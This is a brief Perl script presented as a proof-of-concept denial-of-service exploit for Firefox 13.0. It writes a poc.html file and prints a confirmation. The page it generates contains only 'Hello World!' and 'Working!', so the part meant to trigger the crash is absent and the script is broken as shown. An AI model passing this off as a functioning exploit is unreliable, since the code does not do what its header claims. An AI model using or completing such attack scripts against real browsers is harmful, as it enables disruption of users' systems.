#!/usr/bin/perl # Mozilla Firefox Web Browser 13.0 Remote Denial-of-service Exploit Proof of Concept # Author: Ucha Gobejishvili use Term::ANSIColor qw(:constants); open FH, ">poc.html"; print FH " Hello World!

Working!

\n"; close FH; print RED, "POC Created."; print " \n"; exit;